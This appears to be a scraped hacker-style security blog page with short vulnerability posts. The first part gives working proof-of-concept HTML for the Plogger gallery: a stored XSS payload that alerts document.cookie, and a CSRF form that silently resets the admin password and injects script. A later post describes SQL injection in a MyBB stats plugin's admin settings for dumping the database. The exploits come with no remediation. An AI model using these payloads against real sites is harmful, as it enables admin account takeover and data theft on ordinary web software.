<label class="strong" for="description">Description:</label><br />
<textarea name="description" id="description" cols="60" rows="5"><script>alert(document.cookie);</script></textarea>
</p>
<p><input type="checkbox" id="allow_comments" name="allow_comments" value="1" checked="checked" /><label class="strong" for="allow_comments" accesskey="w">Allo<em>w</em> Comments?</label></p>
<input type="hidden" name="pid" value="1" />
<input type="hidden" name="action" value="update-picture" />
<input class="submit" name="update" value="Update" type="submit" />
<input class="submit-cancel" name="cancel" value="Cancel" type="submit" />
</div>
</form>


CSRF Admin Password Reset And XSS

plog-options.php

<form action="http://localhost/plogger/plog-admin/plog-options.php" method="post">
<table class="option-table" cellspacing="0">
<tbody><tr class="alt">
<td class="left"><label for="admin_username"></label></td>
<td class="right"><input size="40" id="admin_username" name="admin_username" value="admin" type="hidden"></td>
</tr>
<tr>
<td class="left"><label for="admin_email"></label></td>
<td class="right"><input size="40" id="admin_email" name="admin_email" value="localhost@hotmail.com" type="hidden"></td>
</tr>
<tr class="alt">
<td class="left"><label for="admin_password"></label></td>
<td class="right"><input size="40" id="admin_password" name="admin_password" value="123456789" type="hidden"></td>
<tr>
<td class="left"><label for="confirm_admin_password"></label></td>
<td class="right"><input size="40" id="confirm_admin_password" name="confirm_admin_password" value="123456789" type="hidden"></td>
</tr>
<td class="left"><label for="gallery_url"></label></td>
<td class="right"><input size="40" type="text" id="gallery_url" name="gallery_url" value="<script>alert('hi');</script>" type="hidden"/></td></tr>
</tbody></table>
<td class="right"><input class="submit" name="submit" value="DOne" type="submit"></td>

--------------------------------------------------------
# Email - saadi_linux@rocketmail.com
# GreeTz 2 All Pakistani Security Researchers
# Home - http://security-geeks.blogspot.com
---------------------------------------------------------
READ MORE

Mybb Plugin PRO STAT [SQLI]

Posted by Saadi On Saturday 2 March 2013 3 comments
I was working on some mybb plugins and found some vulns in that..
So for now PRO STAT .

Vendors: http://prostats.wordpress.com

Pro stat is Well known Mybb plugin and vuln to sql injection Inside admin panel and Change viewer.
ITs not much exploitable but bcz u want admin logins but can be handy to dumping the db if u failed to shell it ;)

oka here

Goto Plugins ANd just inject num rows settings..
ITs vuln to most of the parameter inside settings.
LIke POST FIELD ps_num_rows etc.

Screen Shot
READ MORE

My Updates

Posted by Saadi On 1 comments
Sallam , I was thinking to make an blog for my security findings and updates so, All my security updates gona come here.. Cheers Saadi
READ MORE